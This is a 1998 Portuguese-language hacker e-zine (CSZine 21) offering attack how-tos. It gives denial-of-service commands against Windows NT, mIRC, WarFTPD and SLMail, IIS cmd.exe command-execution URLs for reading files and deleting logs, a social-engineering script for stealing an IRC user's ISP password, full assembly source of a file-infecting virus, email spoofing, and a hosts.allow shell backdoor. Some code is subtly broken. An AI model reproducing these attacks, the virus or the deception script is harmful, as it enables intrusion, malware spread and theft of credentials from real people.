Cszine 21
cCCCc sSSSs zZZZZZZZZz ii NNn NN eEEEe 222 11
cCC CCc sSS SSs zZ II NNNn NN eEE EEe 22 22 111
cCC CC sSS SS zZ NN Nn NN eEE EE 22 22 1111
cCCC SSSs zZ ii NN Nn NN eEEE ## 22 11
CCCC SSSs zZ II NN Nn NN EEEEEEEe ## 22 11
CCCC SSSs zZ II NN Nn NN EEEE 22 11
CCC cC Ss sSS zZ II NN NnNN EEe eE 22 11
CCc cCC SSs sSS zZ II NN NNN EEe eEE 22 11
CCCCC SSSSS zZZZZZZZZz II NN NN EEEEE 222222 111111
C S Z I N e - 2 1
¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯
UIN da revista : 16623675
E-Mail da revista : cszine@hotmail.com
Memoserv de Struck : /msg memoserv send Struck <msg>
(Soh no irc.via-rs.com.br)
Page da revista : http://members.xoom.com/cszine
Introduction
Hm..
A zine completou mais de 20 edicoes. To feliz por isso. Ao contrario do que disse o denerval sobre sua zine(Barata Eletrica), isso aqui nao comecou com uma brincadeira naum.
Eu decidi fazer a zine para fonte de pesquisa de todos os begginers, newbies, wannabes, phreakers, hackers e crackers, e ateh mesmo gurus, embora eu ache que eles jah devem estar sabendo de tudo o que e' escrito aqui.
A zine vai continuar.. Talvéz chege a ser uma phrack do Brasil, com umas 50 e tantas edicoes. Mas para isso eu vou precisar de insentivo. Mandem quantos mails quizer. Eu prometo que responderei a todos voces, sem despresar ninguem por saber menos.
Podem perguntar o que quizer, ateh "o que e' UNIX??". Ou se voce nao tiver nenhuma duvida e esta lendo esta zine, enviem um mail para mim apenas dizendo que leu. OKz?
Peço a colaboracao de todos.
Obrigado a todos pela atencao e paciencia que vcs tem em me aguentar todo esse tempo. Falow
Indice
Secao: Materia: Assunto: Autor:
1. Kevin Mitnick TO MITNICK OR NOT MITNICK Bernie S.
2. Internet War Bloqueando... Cheat Struck
3. Hack para iniciantes Hacking Windows NT Cheat Struck
4. IRC Tips Conseguindo senhas no IRC saqueadores
5. VIRII Fonte do pixel virus Episiarca
6. Phreaking Obtendo frequencias Cheat Struck
7. Crackerz Patches para Quake e Sim City Cheat Struck
8. Invasao de privacidade Back Orifice Cheat Struck
9. Hack, the Art More hacker tips Cheat Struck
10. Emails Como o nome jah diz.. Cheat Struck
1. Kevin Mitnick
TO MITNICK OR NOT MITNICK? (por Bernie S.)
Tem tanta gente escrevendo sobre o dito, por conta de uns livros, que nem sempre contam a historia toda, que resolvi escrever uma ou duas coisas. Nao vou falar do que aconteceu recentemente. Isso ai', uma busca no lycos ou no yahoo com certeza vai trazer ate' resumos dos livros publicados sobre o que esta' acontecendo. E o chato e' que quando se conhece a historia mais a fundo, fica-se em duvida, quem e' o malandro na historia. Para comecar, a dupla formada pelo "samurai" e o reporter Markoff ta' contando quase dois milhoes de dolares em direitos autorais pela prisao do cara. O computador do cara que o prendeu continuou sendo invadido depois de efetuada a cacada humana. E o arquivo contendo milhares e milhares de numeros de cartoes de credito de usuarios da Netcom estava disponivel para copia para qualquer um sem grandes dotes informaticos. Alias, a grande maioria das acusacoes contra Mitnick foram retiradas ao longo do processo. Deixa para la', quem quiser, fique pura e simplesmente com o "o cara era culpado, po^"!
Mitnick comecou sua carreira fazendo parte de um grupinho que curtia planejar operacoes contra os sistemas de computacao da Pacific Telephone, junto com outros, como Leonard DeDicco e Susie Thunder. Leonard, operador de computador da Voluntary Plan Assistance ajudava Mitnick a usar um terminal no seu trabalho para obter acesso a instalacoes da DEC nos EUA, de tal forma que nenhuma chamada fosse cobrada. So' que acabou dedando o colega e a DEC instalou uma aparelhagem para monitorar e gravar as atividades do cara. Gracas a essa dedurada, varias coisas, como a pirataria de um software de seguranca interna, copiado para uma universidade do sul da california. Um dia depois, veio a prisao. Foram encontrados 14 codigos de acesso da MCI, anotacoes referentes ao tal sistema de seguranca. E um resumo da lei sobre quebra de sistemas de computacao. Ignorancia nao e' desculpa, nesse caso.
Ai, sao tres acusacoes: fraude telefonica, roubo de software e posse ilegal de codigos de acesso.
Como foi a prisao? Bom, foi negada a fianca, apesar da legislacao americana afirmar que a lei federal so' considera perigoso para a sociedade o reu que for acusado de crime violento, crime capital ou crime relacionado com drogas envolvendo uma sentenca de mais de dez anos. Aqui mesmo no Brasil, o promotor precisa demonstrar a necessidade de manter o individuo preso, caso contrario, o juiz devera' conceder a chamada "liberdade provisoria". A prisao de Mitnick foi feita pelo FBI, portanto, caso de crime federal, but ... de acordo com Jerry Kaplan, um advogado de defesa de Los Angeles, com muita bagagem no ramo, "nao e' comum alguem ser detido sem direito a fianca, a menos que o caso envolva uma indicacao de periculosidade". Foi usado o argumento que a liberdade do acusado "punha em perigo a seguranca de qualquer outra pessoa ou da comunidade". A linguagem vaga de uma lei da fianca foi usada para punir um reu impopular?
A custodia de Mitnick foi negada com base no Ato de Reforma da Custodia de 1984, que autoriza a detencao em casos onde o oficial de justica "conclui que nenhuma condicao ou combinacao de condicoes de liberdade assegurara' de forma razoavel a .. seguranca de qualquer outra pessoa ou comunidade". (*) A justificativa dos oficiais de justica era a prevencao de futuros crimes e nao a prevencao da fuga do reu. "Armado" com um teclado, ele era um perigo para a comunidade. Ai' arrumaram tambem o fato de que o cara poderia ter sido culpado de um boato que foi liberado por uma agencia de noticias, em abril de 88, segundo o qual o Security Pacific National Bank tinha perdido US$ 400 milhoes no primeiro trimestre do ano. Outra coisa foi a alegacao de que o cara entrara no computador da NSA, que como todo mundo sabe, e' uma das coisas mais seguras do planeta.
Junto com outras alegacoes de mau comportamento, o apelo do reu foi rejeitado.
Mais tarde, houve uma tentativa de fazer um acordo, coisa comum nos EUA. O escritorio do promotor reviu sua avaliacao quanto a seriedade do crime sendo julgado. Mitnick nao danificou o sistema de computadores da DEC nem tentou fazer grana com o software pirateado. Houve uma re-avaliacao do dano causado a DEC e chegou-se a conclusao de em vez de US$ 4 milhoes, a coisa teria sido por volta de US$ 160.000 em "tempo perdido". Mas a juiza Pfaelzer nao gostou da ideia do acordo. Depois de um ano de cadeia, tres meses depois concordou-se com uma sentenca que obrigasse Mitnick a passar seis meses em um programa de reabilitacao. Um tipo de "alcoolicos anonimos" para programadores. Isso em julho de 1989.
Uma semana depois da condenacao, o assistente da Procuradoria dos EUA, James Asperger admitiu que nao havia evidencias relacionando Mitnick ao lance do Security Pacific Bank e que era lorota o dito cujo ter entrado nos computadores da NSA. Nao existe forma de comprovar que ele tambem fora responsavel pela desconexao dos telefones da atriz Kristi McNichol ou mudar o credito na TRW (instituicao de credito norte-americana) de um juiz que o sentenciou anteriormente. Eram acusacoes infundadas.
(Fim da parte 1)
2. Internet WAR
Bloqueando..
Essa secao nao vai ficar ae. E' soh para eu poder publicar essa materia que ta nas minhas maos a algum tempo. Se voce quizer ser editor dessa edicao yudo bem.. jah sabe o que fazer naum??
Bloqueando IIS do WinNT
~~~~~~~~~~ ~~~ ~~ ~~~~~
Existem duas maneiras basicas.. Nao vou ficar explicando tudo porque ia ficar xarope e ninguem iria ler, entaum ai tah os logs.
1.
telnet 200.220.222.2 80
GET ../..
2.
telnet 200.220.222.2 19 | telnet 200.220.222.2 1031
Bloqueando o DNS do WinNT
~~~~~~~~~~ ~ ~~~ ~~ ~~~~~
Moore simple. Atencao o IP 200.220.222.2 refere-se ao IP do sistema que sera' atakado. No prompt da shell digite:
telnet 200.220.222.2 19 | telnet 200.220.222.2 53
Bloqueando o mIRC 5.3
~~~~~~~~~~ ~ ~~~~ ~~~
Utilizara um bug encontrado no identd apenas dessa versao.
telnet 200.220.222.2 113
telnet 200.220.222.2 113
telnet 200.220.222.2 113
telnet 200.220.222.2 113
telnet 200.220.222.2 113
telnet 200.220.222.2 113
telnet 200.220.222.2 113
Bloqueando o FTP do WinNT
~~~~~~~~~~ ~ ~~~ ~~ ~~~~~
Isso apenas com os servidores que usam o WarFTPD.
telnet 200.220.222.2 21
USER xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PASS xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Bloqueando Login no Linux
~~~~~~~~~~ ~~~~~ ~~ ~~~~~
Funciona em algumas versoes do Redhat e Debiam. Ja' logado no sistema digite :
nvi /var/log/wtmp
Bloqueando um UNIX numa maquina local
~~~~~~~~~~ ~~ ~~~~ ~~~~ ~~~~~~~ ~~~~~
Aqui vai a fonte do exploitem c.
----------------------------Corte Aki--(thrash.c)----------------------------
#define BIGNUM 128*1024*1024
#define PAGESIZE 4*1024
char eatmem[BIGNUM];
main()
{
for (i=0 ; i += PAGESIZE ; i < BIGNUM) ++eatmem[i];
}
-----------------------------------------------------------------------------
Bloqueando um MS-DOS em maquina local
~~~~~~~~~~ ~~ ~~~~~~ ~~ ~~~~~~~ ~~~~~
Coloque isso no AUTOEXEC.BAT para travar ao iniciar.
echo fuck you > fuck.exe
type fuck.exe
call fuck.exe
Bloqueando via OOB nuke
~~~~~~~~~~ ~~~ ~~~ ~~~~
Voce pode usar o winnuke, ou apenas:
telnet 200.220.222.2 19 | telnet 200.220.222.2 139
Bloqueando via Ping of Death
~~~~~~~~~~ ~~~ ~~~~ ~~ ~~~~~
Entre no prompt da shell e digite:
PING -l 65527 -s 1 200.220.222.2
Bloqueando pop3 via SLMail
~~~~~~~~~~ ~~~~ ~~~ ~~~~~~
Funciona nas versoes 2.5 .
telnet 110
user fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck
pass fuck
3. Hacking para iniciantes
Hacking Windows NT
Putz. Eu to pegando mesmo no pe' do WinNT. Nao sei se eu jah comentei mas eu to me especializando, alem dos UNIXes em geral, também nos WinNT, pq acho que atualmente sao os mais usados aqui no Brasil. Lah fora e' outra historia.
Vamos lah!
Corrigindo edicao passada
Edicao passada mostrei os problemas em ter o cmd.exe no \cgi-bin e dei como exemplo a alteracao dos arquivos de logs. O exemplo ficou meio errado. Ficaria assim:
http://www.hostname.com/cgi-bin/cmd.exe?/c%20date%2020/11/97
http://www.host.com/cgi-bin/cmd.exe?/c%20del%20c:\winnt\system32\logfiles\in980413.log
Sendo que mudaria a data para 20/11/97 e a data atual e' 13/4/98.
Violando .bat's e .cmd's
No seu browser digite:
http://www.host.com/scripts/merda.bat
Mesmo sem existir o arquivo, ele sera aberto. Entaum como aproveitar isso?? Nos registros do winNT para abertura de .bat's e .cmd's esta tipo assim:
.cmd=C:\WINNT\System32\cmd.exe /c %s %s
Entao digite no seu browser:
http://www.host.com/scripts/merda.bat?&type+c:\autoexec.bat
Agora o autoexec.bat do sistema sera' baixado para voce. Isso ficaria logado no IIS do sistema. Para despistar o log voce devera' fazer algo tipo..
http://www.host.com/scripts/merda.bat?&type+c:\autoexec.bat?&time
Como o time nunca para. voce tera' que cancelar o download e assim o IIS mostrará ao admin que o arquivo nao foi totalmente baixado.
Redirecionando scripts
Voce precisa saber de algum script que existe na maquina. Também pode colocar um por ftp. depois entre no seu browser e digite:
http://www.hosts.com/scripts/merda.bat%0A%0D>local\file.bat
Onde o local\file.bat e' o caminho completo do script. Ele serah colocado junto aos scripts executaveis com o nome de merda.bat .
Agora pense como colocar o cmd.exe no \scripts???
http://www.server.com.br/scripts/cmd.exe%0A%0D>\winnt\system32\cmd.exe
NEWDSN.EXE
Com esse programa e' possivel criar qquer arquivo em qquer diretório do servidor. E' meio dificiul de explia-lo mas vou tentar.
Isso tudo e' apenas para criar um arquivo vasio em um novo diretório do sistema: "/putoes/paulo.html" .
Se voce tiver um sistema winNT disponivel, eu aconselho ficar brincando com a própria maquina e descobrir o que isso pode fazer.
Voce precisará setar algumas coisas nesse programa com driver, dsn, dbq, newdb e attr.
driver= Indique os drivers que serao usados. Deixe como esta para criaçao de arquivos (Microsoft+Access+Driver+(*.mdb))
dsn= Deixe assim, isso criara' arquivos de exemplos microsoft
dbq= Indica o arquivo que sera' criado. No exemplo e' ../../putoes/paulo.html
newdb= Indica a funcao. Cria novo arquivo de dados(CREATE_DB).
attr= Atributos do arquivo. No exemplo nao tem nenhum atributo. Se quizesse deixar o arquivo oculto, deveria estar +h como valor.
4. IRC Tips
Conseguindo senhas no IRC
Esta conversa foi escrito por Eljaker do grupo espanhol saqueadores. Voce deve entrar com um nick de garota e parecer bem iniciante. Tem que parecer que e' a primeira vez qe vc usa o irc e nao sabe quase nada de informatica. Lembre-se de falar como uma garota e nao como caminhoneiro :)
Na conversa a seguir ele entrou como Maria. A conversa foi adaptada por mim para ser usada aqui no Brasil.
Lugar: Canal de irc
Hora: Domingo a tarde (hora ideal)
Vitima: Jose Luis Vera, casado, quarentaetantos...
Maria>>Olá
JLuis>> ola
JLuis>>Alguem aqui e' de novo hamburgo??
Maria>>sim eu
JLuis>>Gostaria de te conhecer, de que parte de Novo Hamburgo?
Maria>>na Marcilio dias
JLuis>>ah, eu moro no centro
JLuis>>fica em perto da marcilio.
Maria>>algum dia podemos nos encontrar.
JL>>…, um dia desses talvez
JL>>Olha..
M>>sim
JL>>Quantos anos voce tem?
M>> completo 23 en julho
JL>>Eu sou um pouco mais velho, mas isso nao importa
M>>nao
JL>>Bom, tenho que ir
JL>Encantado em te conhecer, vamos ver se nos encontramos outro dia,
JL>>neste mesmo canal
M>>Ok, tchau
[No outro dia]
JL>>Ola
M>>oi jose, como vai?
JL>>Ola Maria, outra vez aqui.
[Maria lhe pergunta varias coisas sobre o mIRC, seus comandos, configuracoes, ate' que se dispedem novamente]
[No terceiro dia]
M>>No outro dia me disse, que eu tinha que colocar a senha, que o povedor de
M>>internet me da, no ultimo lugarzinho daquele programa de conexao, mas
M>>quando eu ponho, saem asteriscos e nao se ve nada.
JL>>Nao sei porque saem os asteriscos, no meu tambem saem
JL>>Acho que é para que ninguem veja sua senha quando digita.
JL>>Veja, por exemplo minha configuracao é:
JL>>Nome: CTV
JL>>Telefone: 055
JL>>Usuario: JLuis@ctv
JL>>Senha:
JL>>bem minha clave nao vou dizer, mas aqui tem que colocar a sua senha
JL>>e entao irao sair uns asteriscos
M>>é que eu to usando a conta do meu irmao, mas ele vai a cancelar dentro de
M>>duas semanas porque ele a usa pouco, e eu só uso para o mirc
JL>>Que pena :(
M>>o melhor seria se tu me emprestasse tua senha, podiamos continuar conversando
JL>>Nao sei..
JL>>No CTV me diseram para nao disela para ninguem
M>>vamos
M>>nao conto para ninguem
JL>>Bem, minha senha é XXXX
JL>>Mas nao diga a ninguem ok?
M>>ok
[Moleza!!!!]
5. VIRII
Codigo vironico para debug
Custou, mas consegui esta fonte de virus para ser compilada com o debug do dos. Para compilala digite: debug < v1rv.dbg
O virus e' conhecido como pixel virus e infecta arquivos .exe e .com.
Quem me conseguiu essa fonte foi o Episiarca, mas nao quiz escrever sobre ele. Na proxima edicao eu comento mais sobre isso.
-----------------------------Corte Aki--(v1rv.dbg)---------------------------
a
JMP 0116
NOP
DEC CX
PUSH SI
ADD [BP+SI],CH
CS:
INC BX
DEC DI
DEC BP
ADD [BX+04],CL
ADD [BX+SI],AL
ADD [BX+SI],AX
ADD [BX+SI],AL
ADD [BX+SI],AL
MOV AX,CS
ADD AX,1000
MOV ES,AX
INC BYTE PTR [0105]
MOV SI,0100
XOR DI,DI
MOV CX,014F
REPZ
MOVSB
MOV DX,025F
MOV AH,1A
INT 21
MOV DX,0106
MOV CX,0016
MOV AH,4E
INT 21
JB 019E
MOV DX,027D
MOV AX,3D02
INT 21
MOV [0114],AX
MOV BX,AX
PUSH ES
POP DS
MOV DX,034F
MOV CX,FFFF
MOV AH,3F
INT 21
ADD AX,034F
CS:
MOV [0112],AX
DS:
CMP WORD PTR [0352],5649
JZ 0188
XOR CX,CX
MOV DX,CX
CS:
MOV BX,[0114]
MOV AX,4200
INT 21
JB 0188
MOV DX,0000
CS:
MOV CX,[0112]
CS:
MOV BX,[0114]
MOV AH,40
INT 21
CS:
MOV BX,[0114]
MOV AH,3E
INT 21
PUSH CS
POP DS
MOV AH,4F
MOV DX,025F
INT 21
JB 019E
JMP 013E
MOV DX,0080
MOV AH,1A
INT 21
CMP BYTE PTR [0105],05
JB 0207
MOV AX,0040
MOV DS,AX
MOV AX,[006C]
PUSH CS
POP DS
AND AX,0001
JZ 0207
MOV DX,01C4
MOV AH,09
INT 21
INT 20
INC BP
DB 6E
AND [SI+75],DH
AND [BX+SI+43],DL
AND [BX+SI+61],CH
JNS 01F1
JNZ 0241
AND [BP+69],DH
JB 024D
JNB 01FA
PUSH DX
PUSH SI
XOR [SI],BP
AND [BX+DI+20],BH
XOR BYTE PTR [BP+DI+74],61
AND [DI+73],AH
AND [BP+DI+75],DH
AND [BX+DI+75],DH
DB 69
DB 6E
JZ 0253
AND [BX+65],AH
DB 6E
DB 65
JB 025A
DB 63
DB 69
MOV [206E],AL
ADD [BX+SI],SP
AND [BX+SI],AH
AND [BX+SI],AH
OR CL,[DI]
AND AL,BE
AND AL,02
MOV CX,002B
XOR DI,DI
REPZ
MOVSB
XOR DI,DI
CS:
MOV WORD PTR [010E],0000
CS:
MOV [0110],ES
CS:
JMP FAR [010E]
PUSH DS
POP ES
MOV SI,044F
CMP BYTE PTR [0105],01
JNZ 0234
SUB SI,0200
MOV DI,0100
MOV CX,FFFF
SUB CX,SI
REPZ
MOVSB
CS:
MOV WORD PTR [0100],0100
CS:
MOV [0102],DS
CS:
JMP FAR [0100]
INT 20
n v1rv.com
r cx
151
w
q
-----------------------------------------------------------------------------
6. Phreaking
Obtendo Frequencias
Isso jah aconteceu comigo e eu me perguntei: "como serah que fizeram isso??". Eu sempre me pergunto isso quando descubro algo novo e vou ateh o fundo tentar descobrir.
Deixa eu explicar:
Esses dias a minha conta telefonica tava de por inveja em qquer um que acha que fica muito tempo conectado a inet. Mais de R$ 300,00. Logo eu disse: "Minha mae vai me matar!!". Soh que ae eu comecei a ver as chamadas e no pulso(sabe, quando passa de um limite com o telefone ligado) nao tava tao alto assim. Entao da onde veio esses trezentinhos se no das chamadas a internet??
Logo notei chamadas a varios telefones estrangeiros. 4 para os EUA, 5 para a Espanha, e sei lah onde mais. Os numeros tavam alí. Liguei para a Central para ver se descobria de quem eram os numeros e pimba! Tudo de BBS's estrangeiras, nos EUA eram 2 nos demais 1 apenas.
Pensei comigo os dias das chamadas, mesmo sabendo que eu nao acesso a BBS's estrangeiras, e nao me lembrei de nada que batesse com akeles nomes. Entao o que me veio na cabeça foi: "Um phreaker vez isso comigo. Soh pode!".
Liguei para a CRT e disse para verificarem denovo a conta numero X que haviam sido feito chamadas para fora do pais que eu nao tinha feito. A primeira pergunta que me fiseram foi "Voce tem aparelho telefonico sem fio?". Disse que sim e perguntei por que?? Sabe qual foi a resposta???
"Alguem pode acertar a frequencia do seu aparelho e utilizar a sua linha."
A não. Eu vou descobri como se faz isso e nao se preocupem que eu mostro para voces. Pra falar a verdade eu sei +/- como se fazer isso.
Primeiro, vcs devem estar consientes que os aparelhos telefonicos sem fio enviam uma frequencia FM para a base onde esta ligada a linha telefonica. Sendo assim nos teriamos que ligar um aparelho telefonico sem fio num radio para acerta a frequencia exata.
Agora descobrir a frequencia e' outra história.
Eu gostaria que me mandassem emails dizendo tudo o que vcs sabem sobre esse assunto. Pois estou planejando fazer uma nova box baseada nisso, que servira' para efetuar ligacoes gratuitas e ainda nao ser pego pelo bina. ta bom assim, nao tah? Mas eu vou precisar da colaboracao de todos.
7. Crackerz
Patches para Quake
Se voce tem o jogo Quake completo(nao funciona com shareware), va em http://www.planetquake.com/ e pegue la' os diversos patches para o jogo.
Caso voce nao saiba, patches sao arquivos que devem ser substituidos por outros para alterar o jogo. Tipo nos que voce encontrara' nesse url darao armas novas, fazes novas ou inimigos novos.
Aqui vao os urls completos para cada titulo:
Titulo: Url:
Hover Public Beta v0.60 http://www.planetquake.com/mod/
Threewave Capture http://www.planetquake.com/quakex/threewave/
AirQuake http://www.planetquake.com/ikq/
The Afterlife http://www.planetquake.com/rxn/
DoomTC http://www.planetquake.com/doom
Estes sao os principais. Voce tambem pode encontrar uns muito bons nos seguintes endereços:
http://www.oz.net/~simitar/model.html
http://avalon.viewpoint.com/bubbah/guardian/
http://www.oz.net/~simitar/
http://www.brutality.com/efq
http://kombat.webwarriorz.com
Sim City
Eu jah confessei que eu nao sou muito do cracking. Eu prefiro estudar redes, sistemas operacionais, bugz e phreak. Mas nao gosto de ficar por fora em nada, por isso estou passando crackz para jogos meio antigos mais para aprender tanto quanto vcs aprenderam.
No Sim City existe um crack jah conhecido para fazer voce comecar o jogo com o maximo de grana, U$65,536,00. Vou explicar aqui como faze-lo se vc ainda nao sabe.
Rode o debug num game gravado do simcity. Tipo.. struck.sc1 .
Agora acompanhe o que vc deve fazer:
-e 12a
XXXX:012A 00.
Isso indica que vc tem U$00,00 de dinheiro para mudar para 65,536,00 vc deve mudar digitar 'FF' e dar espaço. Ficara assim:
XXXX:012A 00.FF FF.
Agora digite 'FF' novamente e de enter.
XXXX:012A 00.FF FF.FF
-w
O 'w' salva as alteracoes.
Como FF e' o caracter hexadecimal mais extendido possivel, esse e' o maximo de dinheiro que voce pode conseguir.
Outro meio de se fazer isso e' salvando um jogo, digamos com 10 mil dolares (10,000,00). Ae entao rode um editor hexadecimal no arquivo do jogo salvo e procure por esse valor.
Altere-o e salve.
Volte para o jogo e carrege esse arquivo. Tcham tcham tcham tcham!!!
Isso também funciona no DOOM2 para aumentar o valor da municao.
E' soh isso hoje galera.
8. Invasão de privacidade
Back Orifice
Nao sei se voce jah ouviu falar no BO??? Se jah, nao rode ele no seu windows e se jah rodou leia o patch dele aqui e aprenda como tira-lo.
O que ele faz e' mapear suas unidades (tanto HD, CD e Disquete) para qquer um que tiver o cliente BO. O nome do programa que faz a backdoor e' BOSERVE.EXE ou BO.EXE e nao possui icone.
A +/- um mes atras (na minha ultima conexao com o Windows) peguei ele com o mesmo cara que meu conseguiu o patch. Ele na epoca nao sabia bem para que servia. Quando rodei o BO.EXE (havia sido renoeado) ele se auto-deletou depois de carregar um pouquinho.
Na hora pensei que fosse virus e nao consegui pegar mais ele para ver o codigo.
Ontem 26/9/98 eu me conectei com o windows novamente e o cara tava lah. Fiz uma coisa que eu nao costumo fazer, scanear meu próprio ip. Isso pq o netscape tava dando uns erros (nao achava nenhum host).
Entao encontrei a porta 666 aberta. Suspeita numero um.
Me conectei ao meu proprio host por essa porta e veja o que apareceu quando se teclava 'l'.
lHTTP/1.1 400 Bad Request
Server: BO/1.20
Date: Sat, 03 Jan 1998 13:02:34 GMT
Conte
nt-type: text/html
Public: GET, POST
<HEAD><TITLE>Badly formatted request</TITLE><
Doup!!! Logo percebi o Server: BO/1.20.
Falei com o kra e ele me mostrou que o BO ainda tava instalado. Entao me mostrou como qquer um poderia tanto mapear minhas unidades quanto consegir shell no DOS.
Que malandragem! Como o kra e' tri parceiro meu, nao avacalhou e me conseguiu o patche para tirar isso.
Nao consegui escrever muito aqui porque tava meio em cima da hora, mas na próxima edição eu coloco mais detalhes.
Para retirar o BO, vc pode tentar conseguir ele com alguem lah do #hackers, #hack_planet ou #UKE. Ou seguir os seguintes passos.
- Entre no REGEDIT ( \Windows\Regedit.exe )
- Procure os registros em HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\RunServices
- Alí estao os programas que rodaram automaticamente ao inicializar o windos
- Procure pelo REgistro de nome "(padrão)".
- O conteudo dele deve ser " .EXE"
- delete esse registro.
- Reinicie o Windows
- Va no diretorio \Windows\system e delete o arquivo " .EXE", ele também nao possui icone e pode ser dificul encontra-lo se voce nao usar o Explores como lista no modo de exibição.
- Pronto o BO esta retirado.
O BO pode ser encontrado em http://www.cultdeadcow.com/
Na próxima edicao ensinarei como usar o cliente do BO.
9. Hack, the Art
Faker Mail
Mandar mails anonimos e' maior moleza. De uma olhada nos LOGs que depois eu explico.
telnet host.com.br 25
helo server
mail from: falso@email.com.br
250 <falso@email.com.br> ... Sender Okay
rcpt to: vitima@email.com.br
250 <vitima@email.com.br> ... Recipiant Okay
data
354 Enter mail, end with "." on a line by itself
From: falso@email.com.br
To: vitima@email.com.br
Subject: Digite o subject
Digite aqui a sua mensagem
.
250 Mail accepted
QUIT
Agora entendendo..
Voce manda email para um usuario que nao existe, depois faz com que ele remande para a verdadeira origem(vitima@emal.com).
Assim ninguem podera' lhe descobrir a nao ser que consiga os arquivos de log do servidor de email.
Desmistificando os "falsos hackers"
Voce ja' deve ter acessado aquelas paginas "hackers" onde tem uma secão de hosts hackeados, naum?? A maioria dos lamers poem isso na sua page para mostrar aos visitantes que eles sao os fodas.
Mas voce descobre se o kra sabe mesmo, nao por estes hosts e sim pelo assunto tratado na page. Tipo.. Um dia eu entrei numa page onde ensinava como hackear homepages. Veja os topics desse texto:
- Hackeando via FTP
- Hackeando via PHF
- Hackeando por Engenharia social
E quando cheguei no "HosTs HaCKeAd0s" e ví que haviam apenas hosts da xoom e geocities (sites gratuitos). Tanto a xoom quanto a geocities, nao caem mais na famosa engenharia social. E quanto ao PHF e FTP nao funcionam em nenhum servidor de homepages do mundo (eu acho).
Entao como eles fizeram???
Chegaram na pagina de cadastro da XOOM e Geocities e fizeram varios cadastros de usuarios diferentes. Ae mandaram o mesmo html para ambos os espaços dos recem-cadastrados com a mensagem "Esta pagina foi hackeada pelo GrandeReiDosLamers".
Quale'!! A xoom da um espaço de 11MB para serem utilizados nao para chegar um otario e colocar um misero index.html apenas para impressionar os outros.
Porra! Esses caras tem que se fuder mesmo e se voce pensa em fazer o mesmo voce nao passa de uma bixa adotada que nao tem capacidade de fazer algo serio e vai se agarrar na saia da mamãe quando o FBI chegar na sua casa, se e' que voce merece a visita deles.
Backdoor para usuarios com permissao
E' mais ou menos igual a backdoor vista na edicao passada. Porem essa e' para usuarios com permisao de usar o telnet do sistema.
Aconselho voce fixar o seu ip antes de coloca-la, caso contrario voce pode perder a backdoor para sempre. IP spoof tambem serve.
Digite o /etc/hosts.allow e adicione a seguinte linha:
in.telnetd: 200.220.222.22: twist /bin/sh sh -i
Note que no lugar do "200.220.222.22" voce deve colocar o seu ip fixo ae e' soh acessar o sistema e prounto. Caso voce de um spoof, altere seu ip para o colocado alí.
Essa backdoor e' muito visivel ao root. Nao aconselho deixar apenas ela rodando.
Caso voce e' o root do sistema, para tirar essa backdoor coloque um # na frente ou delete a linha.
Sharewares
Sabe aqueles sharewares que deixam o usuario usar o programa completo por um mes e depois se auto-desinstalam do sistema?? Eles tem uma falha bem visivel que muitas pessoas jah devem ter percebido.
Eles armazenam a data de instalacao em um arquivo ou setor do disco e quando completam 30 dias depois da data de instalacao, impossibilitam a sua execuçao a menos que se registre-o.
Para que esses 30 dias nao chegem tao rapido, basta modificar a data do seu computador. Para traz e' claro.
DICA: As datas de 11 em 11 anos se repetem, ou seja..
26/9/1998 - sabado.
11 anos antes:
26/9/1987 - sabado.
+11 anos atraz:
26/9/1976 - sabado.
Ae entao os dias da semana bateram com os dias do mes, e vc nao se atrapalhara' todo, soh ficara 11 anos atrasado.
10. Emails
Como o nome jah diz..
Em primeiro lugar, quero deixar claro que eu soh botei essa secao aqui para publicar emails enteresantes. Na aqueles que mandam soh pra dizer que gostou da zine e tal.
Esses eu respondo pessoalmente.
-=-=-=-=-=-=-=-=-=-
Date: Wed, 26 Aug 1998 17:29:27 -0300 (EST)
From: KByte <kbyte@rwx.ml.org> Save Address Block Sender
To: Cheat Struck <cszine@hotmail.com>
Subject: Re: CSZine
On Fri, 25 Sep 1998, Cheat Struck wrote:
> Ae kras!
Fala ae!
> A meu respeito, vcs fazem a melhor zine de segurança do pais. Como eu me enteresso tanto em segurança quanto em quebrar a segurança dos outros, tb fiz uma zine.
Obrigado, antes de tudo.:)
> Ao contrario de voces, a CSZine(http://members.xoom.com/cszine) e' uma zine que busca um publico wannabe.
> Existem muitas informacoes quentes lah. Desde novas backdoors ateh novas box(phreaking).
> Gostaria que vcs lessem e dessem um conseito do que acharam dela.
Eu nao tive tempo de ler muito, mas li as ultimas edicoes e pretendo ler o resto das edicoes em pouco tempo. Pelo o que eu li, voce realmente esta empenhado em fazer uma zine seria, nada de frescura. As materias tem um bom nivel tecnico, mas tem alguns errinhos, que passam dispercebidos, por exemplo : O codigo daquela pagina que dizia ter descoberto um bug nos cgis, que podia registrar dominios, etc, era um simples codigo HTML e nao JavaScript como voce tinha dito. Mas esses erros nao comprometem a integridade da zine, que eh muito boa. (Aposto que a rwx tem muitos mais erros, hehehehe)
Outra coisa, voce deu uma lista de zines, e botou o antigo end da rwx,
http://www.rwx.ml.org, se der pra voce arrumar na proxima, botando
http://rwx.ml.org nos agradeceremos.
Estamos sempre aqui para ajuda-lo se o precisar.
> Obrigado pela atencao.
>
> Cheat Struck
>
Ate mais
OBS : Vou botar uma nota sobre a sua zine na proxima rwx, espero que nao se incomode..:)
[]'s
KByte e toda a RwX
kbyte@rwx.ml.org
Como podem ver eu mandei o primeiro email e a RwX respondeu, ao contrario da Axur05. Os kra de lah sao realmente gente fina e pode confiar neles pra qquer coisa.
